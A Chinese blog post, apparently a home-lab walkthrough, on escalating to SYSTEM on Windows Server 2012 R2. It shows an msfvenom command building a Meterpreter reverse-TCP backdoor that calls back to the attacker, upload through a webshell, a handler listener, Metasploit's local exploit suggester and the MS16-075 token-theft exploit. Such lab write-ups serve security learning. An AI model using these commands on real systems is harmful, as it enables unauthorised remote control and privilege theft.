利用MSF溢出漏洞提权windows server2012

已于 2023-03-29 17:19:28 修改
阅读量1.1k 收藏 9
点赞数 4
分类专栏: 网络安全 Windows 文章标签: 安全
于 2023-03-29 17:09:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53409748/article/details/129840276
版权

实验内容

使用Kali Linux平台的“metasploit framework”工具,针对Windows2012R2操作系统,上传EXP实现系统提权。
在此之前已经上传一句话取得admin权限,在自己虚拟机做演示,大家通常取得的权限可能会比admin低,但也是可以进行以下提权的,这里要把目标提权至system权限。

实验环境

kalil inux

在这里插入图片描述

Windows Server 2012 R2
在这里插入图片描述

开始实验

下载https://github.com/chroblert/WindowsVulnScan
在这里插入图片描述
使用powershell运行KBCollect.ps,生成KB.json
在这里插入图片描述
在这里插入图片描述
修改KB.json编码格式
在这里插入图片描述
这里我把文档拿到了本机进行测试
执行脚本,可能会报错,pip install requests 下载即可
在这里插入图片描述
成功执行
在这里插入图片描述

查看具有公开EXP的CVE

python cve-check.py -C -f KB.json

在这里插入图片描述
生成反弹后门:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.121.139 LPORT=3333 -f exe -o msf.exe

在这里插入图片描述
使用蚁剑连接并上传后门程序
在这里插入图片描述
配置监听会话

msfconsole

在这里插入图片描述
开启监听

use exploit/multi/handler

在这里插入图片描述
启动后门
在这里插入图片描述
成功监听
在这里插入图片描述
查看当前权限getuid
在这里插入图片描述
切换出来为后续使用自动漏洞模块做准备

meterpreter > background

在这里插入图片描述
使用MSF post/multi/recon/local_exploit_suggester模块快速识别系统中可能被利用的漏洞

use post/multi/recon/local_exploit_suggester

在这里插入图片描述

show options

在这里插入图片描述

set showdescription  true

设置会话为1
在这里插入图片描述
run
在这里插入图片描述
使用ms16_075令牌窃取提权

use exploit/windows/local/ms16_075_reflection_juicy

在这里插入图片描述
set session 1
在这里插入图片描述
run
在这里插入图片描述
getuid
在这里插入图片描述
提权成功

²⁰⁰²₀₂.₀₁T̶B̶
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
linux winserver漏洞,Kali Linux实战篇:Windows Server 2012 R2系统漏洞利用过程
weixin_39781930的博客
05-16 2000
本文将复现MS17010漏洞windows Server 2012 R2系统下的利用过程,通过使用msf渗透框架生成的shell以及github上的exp生成的二进制文件相拼接,从而生成一个完整的二进制文件,注入到远程主机的系统进程中。测试环境kali linux 2017 x32(attacker)Windows Server 2012 R2(victim)准备工作首先下载相关的PoC下载et...
利用MSF&CS溢出漏洞提权云服务器windows server2012
weixin_45701675的博客
11-16 2273
Windows系统内核溢出漏洞提权 溢出漏洞是一种计算机程序的可更正性缺陷。溢出漏洞的全名:缓冲区溢出漏洞。因为它是在程序执行的时候在缓冲区执行的错误代码,所以叫缓冲区溢出漏洞。缓冲溢出是最常见的内存错误之一,也是攻击者入侵系统时所用到的最强大、最经典的一类漏洞利用方式。成功地利用缓冲区溢出漏洞可以修改内存中变量的值,甚至可以劫持进程,执行恶意代码,最终获得主机的控制权。 利用Windows系统内核溢出漏洞提权是一种很通用的提权方法,攻击者通常可以使用该方法绕过系统中的所有安全限制。攻击者利用漏洞的关
windows server 2012主机漏洞-复现-修复
weixin_42881032的博客
09-16 1万+
windows server 2012 目录windows server 2012Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CVE-2015-1635)复现Microsoft Windows CredSSP 远程执行代码漏洞(CVE-2018-0886)Microsoft Windows SMB 远程代码执行漏洞(CVE-2017-0148)(MS17-010) Microsoft Windows HTTP.sys远程代码执行漏洞 (MS15-034)(CV
使用MSF进行提权windows提权、linux提权、wesng使用
最新发布
dzqxwzoe的博客
05-20 861
MSF Windows提权​​​反弹shell​​​提权​​​END推荐阅读​​​MSF Linux提权​​​反弹shell​​​补充wesng用法​​Metasploit 是一个渗透框架,kali 内安装了,安装位置如下选定需要使用的攻击模块之后,你只需要使用简单的命令配置一些参数就能完成针对一个漏洞的测试和利用,将渗透的过程自动化、简单化主要作用:漏洞验证、漏洞利用、内网渗透等。
windows server 2012漏洞复现
2301_81305520的博客
03-07 734
windows server 2012漏洞复现
Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)
热门推荐
chaojixiaojingang
12-22 1万+
1.漏洞描述 Windows域服务权限提升漏洞(CVE-2021-42287, CVE-2021-42278)是由于Active Directory 域服务没有进行适当的安全限制,导致可绕过安全限制进行权限提升。攻击者可利用漏洞造成将域内的普通用户权限提升到域管理员权限等危害。 2.影响版本 CVE-2021-42287: Windows Server 2012 R2 (Server Core installation) Windows Server 2012 R2 Windows Serve
【权限提升】windows平台-提权项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2379
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序提供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe 型后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url...  msfpayload windows/meterpret
MySQL数据库渗透及漏洞利用总结
02-25
各种Mysql注入,Mysql提权,Mysql数据库root账号webshell获取等的,但没有一个对Mysql数据库渗透较为全面对总结,针对这种情况我们开展了研究,虽然我们团队今年正在出版《网络攻防实战研究——漏洞利用提权》,但...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
msf windows
09-22
msf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windowsmsf windows
Windows Server 2012 R2服务器Microsoft 消息队列远程代码执行漏洞CVE-2023-21554补丁KB5025288的安装及问题解决
forestqq的博客
07-28 3698
近日,系统安全扫描中发现Windows Server 2012 R2服务器存在Microsoft 消息队列远程代码执行漏洞。本文记录补丁安装中遇到的“此更新不适用于你的计算机”问题及解决办法。
Windows溢出提权 [msf全自动提权练习]
weixin_65722679的博客
07-21 416
Windows溢出提权 [msf全自动提权练习]
Windows Server 2012 R2 MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞
友人A的博客
08-10 447
一、漏洞情况 1、漏洞情况 2、漏洞详情 二、整改记录 1、打开链接 2、点击下载 3、安装更新补丁 4、再次扫描没有该漏洞
Windows Server2012 R2修复SSL/TLS漏洞(CVE-2016-2183)
Linux I Tell U
11-18 4262
是一个TLS加密套件缺陷,存在于OpenSSL库中。该缺陷在于使用了弱随机数生成器,攻击者可以利用此缺陷预测随机数的值,从而成功绕过SSL/TLS连接的加密措施,实现中间人攻击。这个漏洞影响了OpenSSL 1.0.2版本之前的版本,而在1.0.2版本及以后的版本中已经修复了该漏洞
CVE2012-0002(ms12-020)蓝屏漏洞利用
2302_81096429的博客
05-09 674
ms12-020(漏洞全称:Microsoft Windows 远程桌面协议远程代码执行漏洞漏洞是一个远程代码执行漏洞。输入use 0使用漏洞扫描模块,进入后使用show options查看可使用选项设置rhosts为靶机ip。0 auxiliary/scanner/rdp/ms12_020_check是漏洞扫描模块。back返回用use 1使用攻击载荷模块,剩下操作与漏洞扫描模块一样,run执行。设置rhosts为靶机ip,设置完成后run执行,执行后显示漏洞利用。3.搜索ms12-020漏洞
Windows Server 2008 R2 CVE-2012-0002/CVE-2012-0152 漏洞处理
weixin_43360094的博客
08-05 4309
处理windows Server CVE-2012-0002、CVE-2012-0152漏洞
Windows常见的几种提权方法
hackzkaq的博客
05-20 1万+
零基础学黑客,搜索公众号:白帽子左一 作者:掌控安全—杰斯 提权,提高自己在服务器中的权限,主要针对网站渗透过程中,当渗透某一网站时,通过各种漏洞提升WEBSHELL权限以夺得该服务器权限,通常提权是把普通用户的权限提升到管理员权限或者系统权限 在渗透测试过程中,拿到一个webshell之后,一般来说,我们的权限都是目标服务器中间件的权限。 这个时候就需要利用各种漏洞来提升自己的权限,从而能够获得对目标服务器的控制。 1.补丁查询法 简介 补丁一般都是为了应对计算机中存在的漏洞,为了更好的优化计算机的
Windows Server 2012 R2 部署 .NET Core IIS应用程序池自动停止 补丁 漏洞
KingCruel的专栏
04-28 3389
1、https://www.cnblogs.com/56982173513871739239lex/p/13093583.html 由于net core在IIS上运行需要安装对应的Hosting文件,以前的服务器是windows server 2016 安装过程中没有此问题。此次客户提供的是windows server 2012 r2服务器。 net core runtime基于vc_redist.x64运行的,所以也就出现了此类错误需要安装vc_redist.x64才能在iis上运行netcore项..
如何利用msf进行漏洞扫描
05-12
使用Metasploit Framework(MSF)进行漏洞扫描可以帮助您发现系统中存在的漏洞并提供相应的解决方案。以下是使用MSF进行漏洞扫描的步骤: 1. 安装Metasploit Framework:您可以从官方网站https://www.metasploit.com/download下载MSF,根据不同的操作系统选择相应的版本进行安装。 2. 启动MSF控制台:打开命令行界面,输入msfconsole命令启动MSF控制台。 3. 选择扫描模块:在MSF控制台中,输入命令“use module_name”选择相应的扫描模块。例如,如果您想扫描目标系统的漏洞,可以使用“use auxiliary/scanner/http/ssl_tls”命令选择相应的模块。 4. 设置目标:输入“set RHOSTS target_ip”命令设置目标IP地址。如果您要扫描多个目标,则可以使用“set RHOSTS target_ip1,target_ip2”命令。 5. 配置其他参数:根据需要,您可以使用其他命令设置其他参数,例如设置扫描端口、设置扫描器的速度等。 6. 开始扫描:输入“run”命令开始扫描。 7. 查看扫描结果:MSF会在控制台中显示扫描结果。您可以根据扫描结果采取相应的措施,例如修补漏洞、禁用服务等。 请注意,在进行漏洞扫描时,务必遵循相关的法律和道德准则,确保不会对目标系统造成任何损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值